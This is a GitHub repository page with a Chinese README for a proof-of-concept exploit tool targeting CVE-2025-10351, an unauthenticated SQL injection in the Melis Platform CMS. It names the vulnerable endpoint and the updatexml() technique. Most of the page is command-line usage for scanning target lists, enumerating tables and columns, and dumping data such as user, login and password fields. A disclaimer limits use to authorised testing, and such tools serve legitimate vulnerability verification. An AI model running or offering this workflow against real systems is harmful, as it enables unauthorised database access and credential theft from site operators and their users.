ivansmc/CVE-2025-10351-POC
GitHub: ivansmc/CVE-2025-10351-POC
针对 Melis Platform 框架 CVE-2025-10351 未授权 SQL 注入漏洞的自动化 PoC 利用工具,支持数据提取与批量检测。
Stars: 1 | Forks: 0
# CVE-2025-10351 POC - SQL 注入漏洞利用 💉



## 🔗 参考文献
- 📄 [MITRE 上的 CVE-2025-10351](https://www.cve.org/CVERecord?id=CVE-2025-10351)
- 📄 [INCIBE(西班牙国家网络安全研究所)关于 Melis 平台的警告](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform)
## 🚀 描述
此 POC 针对以下端点中的**未经身份验证的基于错误的 SQL 注入**漏洞:
```
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
```
它利用 MySQL 中的 `updatexml()` 来提取:
- 表名
- 列名
- 来自特定或所有列的数据
它还可以检测可能的**基于时间的 SQLi** 向量,以便进行进一步的手动利用。
## 🛠️ 环境要求
使用以下命令安装依赖项:
```
pip3 install -r requirements.txt
```
## 🧪 使用方法
### 基础检测
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
```
### 通过 URL 列表运行
```
python3 CVE-2025-10351-POC.py -l targets.txt
```
### 提取所有表名
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
```
### 从表中提取所有列名
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
```
### 提取所有列中的所有数据
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
```
### 提取特定列
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
```
### 使用不安全模式的代理、Cookie 及调试模式
```
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
```
## ⚙️ 选项
| 参数 | 描述 |
|--------------|-----------------------------------------|
| `-u` | 目标 URL |
| `-p` | 端口 (80, 443 等) |
| `-l` | 包含 URL 列表的文件 |
| `-s` | 基于时间的测试的休眠时间 (默认: 1s) |
| `-at` | 导出所有表名 |
| `-t` | 指定表名 |
| `-ac` | 导出给定表的所有列 |
| `-c` | 要导出的以逗号分隔的列列表 |
| `--proxy` | Burp 代理 http://127.0.0.1:8080 |
| `--insecure` | 在使用代理连接时禁用 TLS 检查 |
| `--cookie` | 用于身份验证请求的 Cookie |
| `--debug` | 调试模式 |
## 📤 输出
- 提取的表将保存到 `tables_extracted.txt`
- 提取的数据将保存到 `_data.txt`
## ⚠️ 免责声明
本文档仅供授权的安全测试和修复使用。请**不要**对您不拥有或未获得明确测试许可的系统使用此 PoC 或复现步骤。作者对任何滥用行为不承担责任。
Made with ❤️ by Manuel Iván San Martín Castillo
标签:CISA项目, CVE-2025-10351, EXP, INCIBE, Maven, Melis Platform, POC, Python, updatexml, Web安全, 报错注入, 数据展示, 数据库攻击, 无后门, 时间盲注, 未授权访问, 概念验证, 漏洞验证, 红队, 网络安全, 蓝队分析, 隐私保护